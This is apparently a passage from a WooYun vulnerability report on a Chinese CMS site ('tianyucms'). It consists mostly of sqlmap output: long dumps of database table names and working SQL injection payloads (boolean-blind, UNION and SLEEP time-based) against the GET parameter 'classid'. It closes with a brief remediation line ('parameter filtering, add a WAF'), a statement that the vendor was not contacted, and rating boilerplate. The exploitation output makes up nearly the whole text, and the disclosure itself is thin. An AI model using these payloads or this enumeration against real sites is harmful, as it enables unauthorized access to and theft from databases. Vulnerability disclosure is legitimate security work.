| ty_common_district |
| ty_common_diy_data |
| ty_common_domain |
| ty_common_failedip |
| ty_common_failedlogin |
| ty_common_friendlink |
| ty_common_grouppm |
| ty_common_invite |
| ty_common_magic |
| ty_common_magiclog |
| ty_common_mailcron |
| ty_common_mailqueue |
| ty_common_member |
| ty_common_member_action_log |
| ty_common_member_connect |
| ty_common_member_count |
| ty_common_member_crime |
| ty_common_member_field_forum |
| ty_common_member_field_home |
| ty_common_member_forum_buylog |
| ty_common_member_grouppm |
| ty_common_member_log |
| ty_common_member_magic |
| ty_common_member_medal |
| ty_common_member_newprompt |
| ty_common_member_profile |
| ty_common_member_profile_setting |
| ty_common_member_security |
| ty_common_member_secwhite |
| ty_common_member_stat_field |
| ty_common_member_status |
| ty_common_member_validate |
| ty_common_member_verify |
| ty_common_member_verify_info |
| ty_common_member_wechat |
| ty_common_member_wechatmp |
| ty_common_myapp |
| ty_common_myinvite |
| ty_common_mytask |
| ty_common_nav |
| ty_common_onlinetime |
| ty_common_optimizer |
| ty_common_patch |
| ty_common_plugin |
| ty_common_pluginvar |
| ty_common_process |
| ty_common_regip |
| ty_common_relatedlink |
| ty_common_remote_port |
| ty_common_report |
| ty_common_searchindex |
| ty_common_seccheck |
| ty_common_secquestion |
| ty_common_session |
| ty_common_setting |
| ty_common_smiley |
| ty_common_sphinxcounter |
| ty_common_stat |
| ty_common_statuser |
| ty_common_style |
| ty_common_stylevar |
| ty_common_syscache |
| ty_common_tag |
| ty_common_tagitem |
| ty_common_task |
| ty_common_taskvar |
| ty_common_template |
| ty_common_template_block |
| ty_common_template_permission |
| ty_common_uin_black |
| ty_common_usergroup |
| ty_common_usergroup_field |
| ty_common_visit |
| ty_common_word |
| ty_common_word_type |
| ty_connect_disktask |
| ty_connect_feedlog |
| ty_connect_memberbindlog |
| ty_connect_postfeedlog |
| ty_connect_tthreadlog |
| ty_dc_collection_content |
| ty_dc_collection_history |
| ty_dc_collection_node |
| ty_dc_collection_program |
| ty_dc_collection_user |
| ty_dc_mall_address |
| ty_dc_mall_extend |
| ty_dc_mall_goods |
| ty_dc_mall_orders |
| ty_dc_mall_sort |
| ty_ebot_robotitems |
| ty_ebot_robotlog |
| ty_ebot_robotmessages |
| ty_ebot_robots |
| ty_forum_access |
| ty_forum_activity |
| ty_forum_activityapply |
| ty_forum_announcement |
| ty_forum_attachment |
| ty_forum_attachment_0 |
| ty_forum_attachment_1 |
| ty_forum_attachment_2 |
| ty_forum_attachment_3 |
| ty_forum_attachment_4 |
| ty_forum_attachment_5 |
| ty_forum_attachment_6 |
| ty_forum_attachment_7 |
| ty_forum_attachment_8 |
| ty_forum_attachment_9 |
| ty_forum_attachment_exif |
| ty_forum_attachment_unused |
| ty_forum_attachtype |
| ty_forum_bbcode |
| ty_forum_collection |
| ty_forum_collectioncomment |
| ty_forum_collectionfollow |
| ty_forum_collectioninvite |
| ty_forum_collectionrelated |
| ty_forum_collectionteamworker |
| ty_forum_collectionthread |
| ty_forum_creditslog |
| ty_forum_debate |
| ty_forum_debatepost |
| ty_forum_faq |
| ty_forum_filter_post |
| ty_forum_forum |
| ty_forum_forum_threadtable |
| ty_forum_forumfield |
| ty_forum_forumrecommend |
| ty_forum_groupcreditslog |
| ty_forum_groupfield |
| ty_forum_groupinvite |
| ty_forum_grouplevel |
| ty_forum_groupuser |
| ty_forum_hotreply_member |
| ty_forum_hotreply_number |
| ty_forum_imagetype |
| ty_forum_medal |
| ty_forum_medallog |
| ty_forum_memberrecommend |
| ty_forum_moderator |
| ty_forum_modwork |
| ty_forum_newthread |
| ty_forum_onlinelist |
| ty_forum_order |
| ty_forum_poll |
| ty_forum_polloption |
| ty_forum_polloption_image |
| ty_forum_pollvoter |
| ty_forum_post |
| ty_forum_post_location |
| ty_forum_post_moderate |
| ty_forum_post_tableid |
| ty_forum_postcache |
| ty_forum_postcomment |
| ty_forum_postlog |
| ty_forum_poststick |
| ty_forum_promotion |
| ty_forum_ratelog |
| ty_forum_relatedthread |
| ty_forum_replycredit |
| ty_forum_rsscache |
| ty_forum_sofa |
| ty_forum_spacecache |
| ty_forum_statlog |
| ty_forum_thread |
| ty_forum_thread_moderate |
| ty_forum_threadaddviews |
| ty_forum_threadcalendar |
| ty_forum_threadclass |
| ty_forum_threadclosed |
| ty_forum_threaddisablepos |
| ty_forum_threadhidelog |
| ty_forum_threadhot |
| ty_forum_threadimage |
| ty_forum_threadlog |
| ty_forum_threadmod |
| ty_forum_threadpartake |
| ty_forum_threadpreview |
| ty_forum_threadprofile |
| ty_forum_threadprofile_group |
| ty_forum_threadrush |
| ty_forum_threadtype |
| ty_forum_trade |
| ty_forum_tradecomment |
| ty_forum_tradelog |
| ty_forum_typeoption |
| ty_forum_typeoptionvar |
| ty_forum_typevar |
| ty_forum_warning |
| ty_home_album |
| ty_home_album_category |
| ty_home_appcreditlog |
| ty_home_blacklist |
| ty_home_blog |
| ty_home_blog_category |
| ty_home_blog_moderate |
| ty_home_blogfield |
| ty_home_class |
| ty_home_click |
| ty_home_clickuser |
| ty_home_comment |
| ty_home_comment_moderate |
| ty_home_docomment |
| ty_home_doing |
| ty_home_doing_moderate |
| ty_home_favorite |
| ty_home_feed |
| ty_home_feed_app |
| ty_home_follow |
| ty_home_follow_feed |
| ty_home_follow_feed_archiver |
| ty_home_friend |
| ty_home_friend_request |
| ty_home_friendlog |
| ty_home_notification |
| ty_home_pic |
| ty_home_pic_moderate |
| ty_home_picfield |
| ty_home_poke |
| ty_home_pokearchive |
| ty_home_share |
| ty_home_share_moderate |
| ty_home_show |
| ty_home_specialuser |
| ty_home_userapp |
| ty_home_userappfield |
| ty_home_visitor |
| ty_lev_bank_log |
| ty_lev_bank_user |
| ty_lev_gift |
| ty_lev_gift_award |
| ty_mobile_setting |
| ty_mobile_wechat_authcode |
| ty_mobile_wechat_masssend |
| ty_mobile_wechat_resource |
| ty_mobile_wsq_threadlist |
| ty_plugin_auction |
| ty_plugin_auction_message |
| ty_plugin_auction_xml |
| ty_plugin_auctionapply |
| ty_portal_article_content |
| ty_portal_article_count |
| ty_portal_article_moderate |
| ty_portal_article_related |
| ty_portal_article_title |
| ty_portal_article_trash |
| ty_portal_attachment |
| ty_portal_category |
| ty_portal_category_permission |
| ty_portal_comment |
| ty_portal_comment_moderate |
| ty_portal_rsscache |
| ty_portal_topic |
| ty_portal_topic_pic |
| ty_rpancn_credit_cardrate |
| ty_security_evilpost |
| ty_security_eviluser |
| ty_security_failedlog |
| ty_strayer_article_content |
| ty_strayer_article_title |
| ty_strayer_attach |
| ty_strayer_category |
| ty_strayer_evo |
| ty_strayer_evo_log |
| ty_strayer_fastpick |
| ty_strayer_member |
| ty_strayer_picker |
| ty_strayer_rules |
| ty_strayer_searchindex |
| ty_strayer_setting |
| ty_strayer_timing |
| ty_strayer_typeoptionvar |
| ty_strayer_url |
| ty_ucenter_admins |
| ty_ucenter_applications |
| ty_ucenter_badwords |
| ty_ucenter_domains |
| ty_ucenter_failedlogins |
| ty_ucenter_feeds |
| ty_ucenter_friends |
| ty_ucenter_mailqueue |
| ty_ucenter_memberfields |
| ty_ucenter_members |
| ty_ucenter_mergemembers |
| ty_ucenter_newpm |
| ty_ucenter_notelist |
| ty_ucenter_pm_indexes |
| ty_ucenter_pm_lists |
| ty_ucenter_pm_members |
| ty_ucenter_pm_messages_0 |
| ty_ucenter_pm_messages_1 |
| ty_ucenter_pm_messages_2 |
| ty_ucenter_pm_messages_3 |
| ty_ucenter_pm_messages_4 |
| ty_ucenter_pm_messages_5 |
| ty_ucenter_pm_messages_6 |
| ty_ucenter_pm_messages_7 |
| ty_ucenter_pm_messages_8 |
| ty_ucenter_pm_messages_9 |
| ty_ucenter_protectedmembers |
| ty_ucenter_settings |
| ty_ucenter_sqlcache |
| ty_ucenter_tags |
| ty_ucenter_vars |
| tyde_addonarticle |
| tyde_addonimages |
| tyde_addoninfos |
| tyde_addonshop |
| tyde_addonsoft |
| tyde_addonspec |
| tyde_admin |
| tyde_admintype |
| tyde_advancedsearch |
| tyde_arcatt |
| tyde_arccache |
| tyde_archives |
| tyde_arcmulti |
| tyde_arcrank |
| tyde_arctiny |
| tyde_arctype |
| tyde_area |
| tyde_channeltype |
| tyde_co_htmls |
| tyde_co_mediaurls |
| tyde_co_note |
| tyde_co_onepage |
| tyde_co_urls |
| tyde_diyforms |
| tyde_dl_log |
| tyde_downloads |
| tyde_erradd |
| tyde_feedback |
| tyde_flink |
| tyde_flinktype |
| tyde_freelist |
| tyde_homepageset |
| tyde_keywords |
| tyde_log |
| tyde_member |
| tyde_member_company |
| tyde_member_feed |
| tyde_member_flink |
| tyde_member_friends |
| tyde_member_group |
| tyde_member_guestbook |
| tyde_member_model |
| tyde_member_msg |
| tyde_member_operation |
| tyde_member_pms |
| tyde_member_snsmsg |
| tyde_member_space |
| tyde_member_stow |
| tyde_member_stowtype |
| tyde_member_tj |
| tyde_member_type |
| tyde_member_vhistory |
| tyde_moneycard_record |
| tyde_moneycard_type |
| tyde_mtypes |
| tyde_multiserv_config |
| tyde_mytag |
| tyde_payment |
| tyde_plus |
| tyde_plus_changyan_importids |
| tyde_plus_changyan_insertids |
| tyde_plus_changyan_setting |
| tyde_purview |
| tyde_pwd_tmp |
| tyde_ratings |
| tyde_scores |
| tyde_search_cache |
| tyde_search_keywords |
| tyde_sgpage |
| tyde_shops_delivery |
| tyde_shops_orders |
| tyde_shops_products |
| tyde_shops_userinfo |
| tyde_softconfig |
| tyde_sphinx |
| tyde_stepselect |
| tyde_sys_enum |
| tyde_sys_module |
| tyde_sys_set |
| tyde_sys_task |
| tyde_sysconfig |
| tyde_tagindex |
| tyde_taglist |
| tyde_uploads |
| tyde_verifies |
| tyde_vote |
| tyde_vote_member |
| tyec_account_log |
| tyec_ad |
| tyec_ad_custom |
| tyec_ad_position |
| tyec_admin_action |
| tyec_admin_log |
| tyec_admin_message |
| tyec_admin_user |
| tyec_adsense |
| tyec_affiliate_log |
| tyec_agency |
| tyec_area_region |
| tyec_article |
| tyec_article_cat |
| tyec_attribute |
| tyec_auction_log |
| tyec_auto_manage |
| tyec_back_goods |
| tyec_back_order |
| tyec_bonus_type |
| tyec_booking_goods |
| tyec_brand |
| tyec_card |
| tyec_cart |
| tyec_cat_recommend |
| tyec_category |
| tyec_collect_goods |
| tyec_comment |
| tyec_crons |
| tyec_delivery_goods |
| tyec_delivery_order |
| tyec_email_list |
| tyec_email_sendlist |
| tyec_error_log |
| tyec_exchange_goods |
| tyec_favourable_activity |
| tyec_feedback |
| tyec_friend_link |
| tyec_goods |
| tyec_goods_activity |
| tyec_goods_article |
| tyec_goods_attr |
| tyec_goods_cat |
| tyec_goods_gallery |
| tyec_goods_type |
| tyec_group_goods |
| tyec_keywords |
| tyec_link_goods |
| tyec_mail_templates |
| tyec_member_price |
| tyec_nav |
| tyec_order_action |
| tyec_order_goods |
| tyec_order_info |
| tyec_pack |
| tyec_package_goods |
| tyec_pay_log |
| tyec_payment |
| tyec_plugins |
| tyec_products |
| tyec_reg_extend_info |
| tyec_reg_fields |
| tyec_region |
| tyec_role |
| tyec_searchengine |
| tyec_sessions |
| tyec_sessions_data |
| tyec_shipping |
| tyec_shipping_area |
| tyec_shop_config |
| tyec_snatch_log |
| tyec_stats |
| tyec_sup_extend_info |
| tyec_sup_fields |
| tyec_suppliers |
| tyec_tag |
| tyec_template |
| tyec_topic |
| tyec_user_account |
| tyec_user_address |
| tyec_user_bonus |
| tyec_user_feed |
| tyec_user_rank |
| tyec_users |
| tyec_virtual_card |
| tyec_volume_price |
| tyec_vote |
| tyec_vote_log |
| tyec_vote_option |
| tyec_wholesale |
| wap_addonarticle |
| wap_addonimages |
| wap_addoninfos |
| wap_addonshop |
| wap_addonsoft |
| wap_addonspec |
| wap_admin |
| wap_admintype |
| wap_advancedsearch |
| wap_arcatt |
| wap_arccache |
| wap_archives |
| wap_arcmulti |
| wap_arcrank |
| wap_arctiny |
| wap_arctype |
| wap_area |
| wap_channeltype |
| wap_co_htmls |
| wap_co_mediaurls |
| wap_co_note |
| wap_co_onepage |
| wap_co_urls |
| wap_diyforms |
| wap_dl_log |
| wap_downloads |
| wap_erradd |
| wap_feedback |
| wap_flink |
| wap_flinktype |
| wap_freelist |
| wap_homepageset |
| wap_keywords |
| wap_log |
| wap_member |
| wap_member_company |
| wap_member_feed |
| wap_member_flink |
| wap_member_friends |
| wap_member_group |
| wap_member_guestbook |
| wap_member_model |
| wap_member_msg |
| wap_member_operation |
| wap_member_pms |
| wap_member_snsmsg |
| wap_member_space |
| wap_member_stow |
| wap_member_stowtype |
| wap_member_tj |
| wap_member_type |
| wap_member_vhistory |
| wap_moneycard_record |
| wap_moneycard_type |
| wap_mtypes |
| wap_multiserv_config |
| wap_myad |
| wap_myadtype |
| wap_mytag |
| wap_payment |
| wap_plus |
| wap_purview |
| wap_pwd_tmp |
| wap_ratings |
| wap_scores |
| wap_search_cache |
| wap_search_keywords |
| wap_sgpage |
| wap_shops_delivery |
| wap_shops_orders |
| wap_shops_products |
| wap_shops_userinfo |
| wap_softconfig |
| wap_sphinx |
| wap_stepselect |
| wap_sys_enum |
| wap_sys_module |
| wap_sys_set |
| wap_sys_task |
| wap_sysconfig |
| wap_tagindex |
| wap_taglist |
| wap_uploads |
| wap_verifies |
| wap_vote |
| wap_vote_member |
+----------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=1 AND 1439=1439
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: classid=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7669743a,0x49667a554e587a667664,0x3a71687a3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=1 AND SLEEP(2)
---
Database: tianyucms
[35 tables]
+-----------------------------+
| iforward_admin |
| iforward_admingroup |
| iforward_arcatt |
| iforward_archives |
| iforward_article |
| iforward_attachment |
| iforward_category |
| iforward_category_priv |
| iforward_comments |
| iforward_config |
| iforward_custom_nav |
| iforward_custompage |
| iforward_game_
修复方案:
参数过滤,上WAF
版权声明:转载请注明来源 白骨夫人@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
评论